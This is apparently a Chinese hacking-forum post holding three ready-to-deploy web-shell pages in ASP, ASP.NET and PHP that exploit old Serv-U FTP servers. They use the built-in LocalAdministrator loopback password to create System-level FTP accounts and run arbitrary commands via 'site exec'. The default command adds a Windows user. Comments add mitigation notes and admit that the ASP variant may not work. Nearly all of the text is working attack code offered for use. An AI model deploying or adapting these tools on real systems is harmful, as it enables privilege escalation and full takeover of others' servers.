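下面代码保存为 servu.asp 即可。它利用 MSXML2.XMLHTTP 组件向 Serv-U 本地管理端口(默认 127.0.0.1:43958)发送 FTP 命令,建立一个用户名为 lake、密码为 admin123、具有 Maintenance=System 权限的 FTP 帐号。
<!--
  servu.asp: Serv-U local privilege-escalation helper (historical, 2004-era Serv-U).

  What the page does (as implemented below): on submit it POSTs, via MSXML2.XMLHTTP, a body
  of FTP commands to http://127.0.0.1:<port>/lake2 (port defaults to 43958). The body logs in
  with the credential pre-filled in the form (LocalAdministrator / #l@$ak#.lk;0@P, the
  built-in loopback administration account of older Serv-U builds), then sends
  "SITE MAINTENANCE" followed by a -SETUSERSETUP record that creates FTP user "lake"
  (password "admin123") on port 21 with HomeDir c:\, Maintenance=System and full
  "RWAMELCDP" access. The "Del User" branch sends -DELETEUSER for the same account.

  Reliability caveats visible in the code: the request is opened asynchronously (third
  Open() argument is True) and the object is released immediately, so the send may not
  complete; no reply is ever read, and the success message is printed unconditionally.
  NOTE(review): XMLHTTP prefixes the body with an HTTP request line and headers; the FTP
  server presumably rejects those as unknown commands before it reaches the User/Pass
  lines. Confirm against a real target before relying on this variant.

  Defensive notes: this is not a buffer overflow. It only works when the web shell runs on
  the same host as a Serv-U build that still accepts this loopback admin credential.
  Mitigations: run a current Serv-U release, run the service under a least-privilege
  account instead of LocalSystem, and alert on loopback connections to TCP/43958 from
  web-server worker processes and on SITE MAINTENANCE / SITE EXEC in Serv-U logs.
-->
<title>Serv-U 2 admin by lake2</title>
<style type="text/css">
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
</style>
<p>Serv-U Local Get SYSTEM Shell with ASP </p>
<p>Author: lake2, <a href="http://lake2.0x54.org" target="_blank">http://lake2.0x54.org</a></p>
<form name="form1" method="post" action="">
<p>user: <input name="duser" type="text" class="TextBox" id="duser" value="LocalAdministrator">
<br>
pwd : <input name="dpwd" type="text" class="TextBox" id="dpwd" value="#l@$ak#.lk;0@P">
<br>
port: <input name="dport" type="text" class="TextBox" id="dport" value="43958">
<br>
<input name="radiobutton" type="radio" value="add" checked class="TextBox"> Add User
<input type="radio" name="radiobutton" value="del" class="TextBox"> Del User
</p>
<p>
<input name="Submit" type="submit" class="buttom" value="Run">
</p>
</form>
<p>
<%
' Form input. All three values are concatenated into the FTP command stream unescaped,
' so a CRLF inside any of them injects further commands; harmless for the tool's own
' purpose, but the page must never be reachable by anyone else.
Usr = request.Form("duser")
pwd = request.Form("dpwd")
port = request.Form("dport")
' Leftover from a variant that also ran a command; unused here.
'Command = request.Form("dcmd")
if request.Form("radiobutton") = "add" Then
    ' Build the admin-channel conversation: login, enter maintenance mode, then one
    ' -SETUSERSETUP record. Each "-Key=Value" line is one setting; the record is
    ' terminated by the line that starts with a space (" Access=...").
    lake2 = "User " & Usr & vbcrlf
    lake2 = lake2 & "Pass " & pwd & vbcrlf
    lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf
    ' Creating a separate domain (as servu.aspx does) was left disabled; the user is
    ' created in the existing domain on port 21 instead.
    'lake2 = lake2 & "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
    ' User lake/admin123, home c:\, Maintenance=System (server-level admin rights),
    ' access flags RWAMELCDP on c:\.
    lake2 = lake2 & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
        "-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
        "-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
        "-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
        "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
        "-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
        "-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
    'lake2 = lake2 & "quit" & vbcrlf
    '--------
    'On Error Resume Next
    ' Fire-and-forget: async POST, object released at once, reply never read.
    ' The URL path "/lake2" is arbitrary; the FTP server sees it only inside the
    ' HTTP request line that XMLHTTP emits before the body.
    Set xPost = CreateObject("MSXML2.XMLHTTP")
    xPost.Open "POST", "http://127.0.0.1:"& port &"/lake2", True
    xPost.Send(lake2)
    Set xPOST=nothing
    ' Printed regardless of whether the server accepted anything.
    response.write "FTP user lake pass admin123 :)<br><BR>"
else
    ' Cleanup path: same login, then -DELETEUSER for lake in the port-21 domain.
    lake2 = "User " & Usr & vbcrlf
    lake2 = lake2 & "Pass " & pwd & vbcrlf
    lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf
    lake2 = lake2 & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & " User=lake" & vbcrlf
    Set xPost3 = CreateObject("MSXML2.XMLHTTP")
    xPost3.Open "POST", "http://127.0.0.1:"& port &"/lake2", True
    xPost3.Send(lake2)
    Set xPOST3=nothing
    ' Also unconditional; no reply is checked.
    response.write "Done!<br><BR>"
end if
%>
Only for Enjoy&Challenge !
</p>
下面保存为 servu.aspx。它利用 Serv-U 的本地管理帐号执行命令(这并非缓冲区溢出,而是内置帐号导致的本地提权)。
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">
'
' servu.aspx: Serv-U local privilege-escalation helper, ASP.NET / VB variant.
' Unlike servu.asp this page speaks raw FTP over TcpClient and echoes every request
' and reply into the response. BTN_Start_Click logs in to the local admin listener,
' creates a temporary domain "cctv" on 0.0.0.0:43859, adds user lake/admin123 with
' Maintenance=System in it, connects to that domain, sends "site exec <cmd>", then
' deletes the domain again and quits.
'
' Love, Where are you ?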
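' Runs the complete exploit sequence for one click of the Start button.
'
' Inputs (from the form): Text_Name / Text_PWD = admin credential (defaults
' LocalAdministrator / #l@$ak#.lk;0@P), Text_Port = admin listener port (default
' 43958), Text_cmd = command passed to "site exec".
'
' Admin connection (127.0.0.1:Port): USER, PASS, SITE MAINTENANCE, -DELETEDOMAIN
' (clears a leftover from an earlier run), -SETDOMAIN (domain "cctv" on
' 0.0.0.0:43859), -SETUSERSETUP (user lake/admin123, Maintenance=System,
' Access c:\ RWAMELCDP). Second connection (127.0.0.1:43859): USER lake, PASS
' admin123, "site exec " & Command. Then -DELETEDOMAIN and QUIT on the admin
' connection and both sockets are closed.
'
' Errors: a failed Connect() on either socket writes the exception text and ends
' the response. A rejected login or refused command is NOT detected; it is only
' visible in the echoed "out:" lines. Rec() reads a single chunk per call, so a
' multi-line reply (for example a banner) would leave the request/reply pairing
' out of step. TODO(review): confirm against a real Serv-U banner.
Sub BTN_Start_Click(sender As Object, e As EventArgs)
    Dim Usr As String = Text_Name.Text
    Dim pwd As String = Text_PWD.Text
    ' Implicit String -> Int32 conversion; a non-numeric port throws before any
    ' socket is opened.
    Dim Port As Int32 = Text_Port.Text
    Dim Command As String = Text_cmd.Text
    Dim LoginUser As String = "User " & Usr & vbcrlf
    Dim LoginPass As String = "Pass " & pwd & vbcrlf
    ' Temporary domain "cctv" listening on 0.0.0.0:43859. Using a private domain
    ' avoids touching the production FTP domain on port 21.
    Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
    Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
    ' User record for the temporary domain. Each "-Key=Value" line is one setting;
    ' the record ends with the line that starts with a space (" Access=...").
    Dim NewUser As String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
        "-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
        "-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
        "-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
        "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
        "-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
        "-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
    Dim Quit As String = "QUIT" & vbcrlf
    Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf
    'Dim client As New TcpClient

    ' --- Admin channel -------------------------------------------------------
    Dim tcpClient As New TcpClient()
    Try
        tcpClient.Connect("127.0.0.1", port)
    Catch eee As Exception
        response.write(eee.ToString())
        response.end
    End Try
    tcpClient.ReceiveBufferSize = 1024
    Dim networkStream As NetworkStream = tcpClient.GetStream()
    Rec(networkStream)
    Send(networkStream, LoginUser)
    Rec(networkStream)
    Send(networkStream, LoginPass)
    Rec(networkStream)
    Send(networkStream, MAINTENANCE)
    Rec(networkStream)
    ' Delete first so a domain left behind by an aborted run does not make
    ' -SETDOMAIN fail.
    Send(networkStream, DelDomain)
    Rec(networkStream)
    Send(networkStream, NewDomain)
    Rec(networkStream)
    Send(networkStream, NewUser)
    Rec(networkStream)

    ' --- Command execution through the new domain ----------------------------
    Dim tcpClient2 As New TcpClient()
    Try
        tcpClient2.Connect("127.0.0.1", 43859)
    Catch eee As Exception
        response.write(eee.ToString())
        response.end
    End Try
    tcpClient2.ReceiveBufferSize = 1024
    Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
    Rec(networkStream2)
    Send(networkStream2, "User lake" & vbcrlf)
    Rec(networkStream2)
    Send(networkStream2, "pass admin123" & vbcrlf)
    Rec(networkStream2)
    ' Command is inserted verbatim; it presumably runs with the privileges of the
    ' Serv-U service process.
    Send(networkStream2, "site exec " & Command & vbcrlf)
    Rec(networkStream2)
    tcpClient2.Close()

    ' --- Cleanup: drop the temporary domain (and the user inside it) ----------
    ' Skipped if response.end above fired, so a failed second connection leaves
    ' the domain and user lake behind.
    Send(networkStream, DelDomain)
    Rec(networkStream)
    Send(networkStream, Quit)
    Rec(networkStream)
    tcpClient.Close()
End Sub

' Reads at most one 1024-byte chunk from the stream and echoes it as "out:".
' The buffer has 1025 elements and the whole array is decoded, so unread tail
' bytes appear as NUL characters in the output; the byte count returned by Read()
' is ignored, so a closed connection (0 bytes) is indistinguishable from an
' all-NUL reply.
Sub Rec(o As Object)
    If o.CanRead Then
        Dim bytes(1024) As Byte
        o.Read(bytes, 0, 1024)
        Dim returndata As String = Encoding.ASCII.GetString(bytes)
        response.Write("out:" & returndata & "<br>")
    Else
        response.Write("What's wrong ?")
    End If
End Sub

' ASCII-encodes data, writes it to the stream and echoes it as "in:".
' Note the echo includes the admin password line, unescaped, in the page.
Sub Send(o As Object,data As String)
    If o.CanWrite Then
        Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
        o.Write(sendBytes, 0, sendBytes.Length)
        response.write("in: " & data & "<br>")
    Else
        response.Write("What's wrong ?")
    End If
End Sub
</script>
<html>
<head>
</head>
<body>
<form runat="server">
<p>
<asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2 admin by lake2</asp:Label>
</p>
<p>
<asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
<asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
<br />
<asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
<asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
<asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
<br />
<asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
<asp:TextBox id="Text_cmd"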
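runat="server"></asp:TextBox>
</p>
<p>
<asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
</p>
<p>
<hr />
<!-- Insert content here -->
</p>
</form>
</body>
</html>
下面保存为 servu.php,是 PHP 版的 Serv-U 本地提权程序(同样不是溢出,而是利用内置管理帐号),可以执行命令。
<?php
/*
 * servu.php: Serv-U local privilege-escalation helper, PHP variant (credited to Will_Be).
 *
 * Runs only when POST fields Port, User and Pass are all present; Command is read
 * without an isset() check, so an empty submission of the exploit step emits a notice.
 *
 * Admin connection (127.0.0.1:Port): USER, PASS, SITE MAINTENANCE, -SETDOMAIN
 * (domain "haxorcitos" on 0.0.0.0:2121), -SETUSERSETUP (user Will_Be/Will_Be,
 * Maintenance=None, Access c:\ RELP). Second connection (127.0.0.1:2121): USER and
 * PASS as Will_Be, then "site exec <Command>". Finally -DELETEDOMAIN for port 2121 on
 * the admin connection and both sockets are closed.
 *
 * Every send and reply is echoed into the page, including the admin password.
 * fsockopen() results are not checked: on failure $sock / $exp are false and the
 * following fgets()/fputs() calls only emit warnings, so the page keeps going.
 * Each fgets() consumes one reply line, so a multi-line reply (e.g. a banner) can put
 * the exchange out of step. TODO(review): confirm against a real Serv-U banner.
 *
 * The default Command ("net user Will_Be heihei /add") creates a local Windows
 * account; it presumably runs with the privileges of the Serv-U service process.
 *
 * Defensive notes: not a buffer overflow; requires code execution on the same host as
 * a Serv-U build that still accepts the loopback LocalAdministrator credential.
 * Mitigate by upgrading Serv-U and running it under a least-privilege account; detect
 * via loopback connections to TCP/43958 from web-server processes and SITE
 * MAINTENANCE / SITE EXEC entries in the Serv-U log.
 */
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
    $sendbuf = "";
    $recvbuf = "";
    // Temporary domain for the new user; avoids touching the production domain.
    $domain = "-SETDOMAIN\r\n".
        "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
        "-TZOEnable=0\r\n".
        " TZOKey=\r\n";
    // One "-Key=Value" per line; the record ends with the line starting with a
    // space (" Access=..."). "c:\\" in a double-quoted PHP string is c:\ .
    $adduser = "-SETUSERSETUP\r\n".
        "-IP=0.0.0.0\r\n".
        "-PortNo=2121\r\n".
        "-User=Will_Be\r\n".
        "-Password=Will_Be\r\n".
        "-HomeDir=c:\\\r\n".
        "-LoginMesFile=\r\n".
        "-Disable=0\r\n".
        "-RelPaths=1\r\n".
        "-NeedSecure=0\r\n".
        "-HideHidden=0\r\n".
        "-AlwaysAllowLogin=0\r\n".
        "-ChangePassword=0\r\n".
        "-QuotaEnable=0\r\n".
        "-MaxUsersLoginPerIP=-1\r\n".
        "-SpeedLimitUp=0\r\n".
        "-SpeedLimitDown=0\r\n".
        "-MaxNrUsers=-1\r\n".
        "-IdleTimeOut=600\r\n".
        "-SessionTimeOut=-1\r\n".
        "-Expire=0\r\n".
        "-RatioUp=1\r\n".
        "-RatioDown=1\r\n".
        "-RatiosCredit=0\r\n".
        "-QuotaCurrent=0\r\n".
        "-QuotaMaximum=0\r\n".
        "-Maintenance=None\r\n".
        "-PasswordType=Regular\r\n".
        "-Ratios=None\r\n".
        " Access=c:\\|RELP\r\n";
    $deldomain="-DELETEDOMAIN\r\n".
        "-IP=0.0.0.0\r\n".
        " PortNo=2121\r\n";

    // --- Admin channel ---------------------------------------------------------
    // $errno/$errstr are passed by reference by fsockopen()'s own signature; the
    // original call-time "&$errno" syntax is a fatal error on PHP >= 5.4.
    $sock = fsockopen("127.0.0.1", $_POST["Port"], $errno, $errstr, 10);
    $recvbuf = fgets($sock, 1024);
    echo "<font color=red>Recv: $recvbuf</font><br>";
    $sendbuf = "USER ".$_POST["User"]."\r\n";
    fputs($sock, $sendbuf, strlen($sendbuf));
    echo "<font color=blue>Send: $sendbuf</font><br>";
    $recvbuf = fgets($sock, 1024);
    echo "<font color=red>Recv: $recvbuf</font><br>";
    $sendbuf = "PASS ".$_POST["Pass"]."\r\n";
    fputs($sock, $sendbuf, strlen($sendbuf));
    echo "<font color=blue>Send: $sendbuf</font><br>";
    $recvbuf = fgets($sock, 1024);
    echo "<font color=red>Recv: $recvbuf</font><br>";
    $sendbuf = "SITE MAINTENANCE\r\n";
    fputs($sock, $sendbuf, strlen($sendbuf));
    echo "<font color=blue>Send: $sendbuf</font><br>";
    $recvbuf = fgets($sock, 1024);
    echo "<font color=red>Recv: $recvbuf</font><br>";
    $sendbuf = $domain;
    fputs($sock, $sendbuf, strlen($sendbuf));
    echo "<font color=blue>Send: $sendbuf</font><br>";
    $recvbuf = fgets($sock, 1024);
    echo "<font color=red>Recv: $recvbuf</font><br>";
    $sendbuf = $adduser;
    fputs($sock, $sendbuf, strlen($sendbuf));
    echo "<font color=blue>Send: $sendbuf</font><br>";
    $recvbuf = fgets($sock, 1024);
    echo "<font color=red>Recv: $recvbuf</font><br>";

    // --- Command execution through the new domain ------------------------------
    echo "**********************************************************<br>";
    echo "Starting Exploit ...<br>";
    echo "**********************************************************<br>";
    $exp = fsockopen("127.0.0.1", "2121", $errno, $errstr, 10);
    $recvbuf = fgets($exp, 1024);
    echo "<font color=red>Recv: $recvbuf</font><br>";
    $sendbuf = "USER Will_Be\r\n";
    fputs($exp, $sendbuf, strlen($sendbuf));
    echo "<font color=blue>Send: $sendbuf</font><br>";
    $recvbuf = fgets($exp, 1024);
    echo "<font color=red>Recv: $recvbuf</font><br>";
    $sendbuf = "PASS Will_Be\r\n";
    fputs($exp, $sendbuf, strlen($sendbuf));
    echo "<font color=blue>Send: $sendbuf</font><br>";
    $recvbuf = fgets($exp, 1024);
    echo "<font color=red>Recv: $recvbuf</font><br>";
    // Command is inserted verbatim (and echoed unescaped below).
    $sendbuf = "site exec ".$_POST["Command"]."\r\n";
    fputs($exp, $sendbuf, strlen($sendbuf));
    echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["Command"]."</font><br>";
    $recvbuf = fgets($exp, 1024);
    echo "<font color=red>Recv: $recvbuf</font><br>";

    // --- Cleanup: remove the temporary domain (and the user inside it) ----------
    echo "**********************************************************<br>";
    echo "Starting Delete Domain ...<br>";
    echo "**********************************************************<br>";
    $sendbuf = $deldomain;
    fputs($sock, $sendbuf, strlen($sendbuf));
    echo "<font color=blue>Send: $sendbuf</font><br>";
    $recvbuf = fgets($sock, 1024);
    echo "<font color=red>Recv: $recvbuf</font><br>";
    fclose($sock);
    fclose($exp);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Serv-U Local Exploit By Will_Be</title>
</head>
<body>
<form method="post">
LocalPort: <input name="Port" type="text" id="Port" value="43958">
<br>
LocalUser: <input name="User" type="text" id="User" value="LocalAdministrator">
<br>
LocalPass: <input name="Pass" type="text" id="Pass" value="#l@$ak#.lk;0@P">
<br>
Command : <input name="Command" type="text" id="Command" value="net user Will_Be heihei /add">
<br>
<input type="submit" name="Submit" value="提交">
<input type="reset" name="Submit" value="重置">
</form>
</body>
</html>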
